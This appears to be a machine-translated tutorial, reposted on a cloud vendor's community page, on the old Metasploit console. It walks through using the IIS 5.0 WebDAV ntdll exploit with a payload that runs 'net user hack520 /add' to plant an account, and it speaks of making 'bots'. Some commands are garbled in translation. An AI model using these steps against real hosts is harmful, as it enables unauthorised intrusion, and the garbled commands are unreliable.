Powerful overflow Toolkit: Use of metasploit command line (go to 77169)

Source: Internet
Author: User

Metasploit is a good thing. I can't think of any other way. Maybe it can help you. metasploit contains a lot of Exploit. I can't say I can use a few more computers to create a few bots.

Download metasploit and double-click it to install it. It is very simple. Just press Enter. After installation, check msfconsole. BAT and msfweb. bat in the installation directory. The first is the console under the command. The second is the program under the graphic interface. Now let's take a look at how to use the command line. After running the command, we will see the welcome interface of metasploit and enter "?". View help, 1

 

Let's explain a lot of commands.

"?" Help
"Cd": this command is familiar to everyone. Just like win, switch the directory.
"Exit" indicates exit.
"Info" displays the current program information
"Quit" to exit the program
"Reload" to load exploit and payloads
Save settings
"Setg" sets an environment variable
"Show" displays the currently available Exploit
"Use" select an exp
"Version" displays the program version
So many commands seem to be a bit dizzy. Actually, the three commands "show" "info" "use" are used. Let's see how they are used.

This program is a big toolkit, integrated with N multiple exploit, we can use show exploits to see which exploit programs are available, 2

Return to gallery | Original Image

 

See it? If you want to use so many overflow programs, you can use them all day long. How can we use so many things ?? For example, if you want to use an overflow program, you must first read its help to learn how to use it. This requires the info command. This command displays the detailed information of the overflow program. For example, if you want to see the usage of the overflow program iis50_webdav_ntdll, enter info exploit iis50_webdav_ntdll on the command line and you will see Figure 3.

 

Here we only view the exploit information. We can also view the shellcode information. In this toolkit, you can define the desired shellcode. Enter "show payloads" in the command line to view the available shellcode list, 4

 

Name on the left and description on the right. We can use the info command to view the specific information of shellcode. Enter the command info payload cmd_generic5, as shown in

 

Note that only required and options are available. Here, required indicates that the required options indicates that the options are optional and the shellcode for Linux systems is started with Linux, starting with cmd and win is for all win systems. In the overflow process, You must select the corresponding shellcode to succeed.

Now let's take a look at the actual situation. Let's take the WebDAV overflow program as an example. Enter use iis50_webdav_ntdll in the command, and then enter show options to view the content to be entered, as shown in 6.

 

Enter set rHost 192.168.1.223 set rHost 80 7 in the command line.

 
 

Here, you have to specify shellcode and enter the following command: After set payload winexec is finished, press enter and then enter SET cmd net user hack520/Add 8, as shown in

 

Now we can launch an attack to 192.168.1.223. Enter show targets to view the operating system code. We all know that WebDAV is targeted at the 2000 system, and enter set targets 0 9.

 

If there is no problem, enter exploit. If the other server has this vulnerability, you will get the shell.

Http://www.metasploit.com/projects/Framework/downloads.html

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.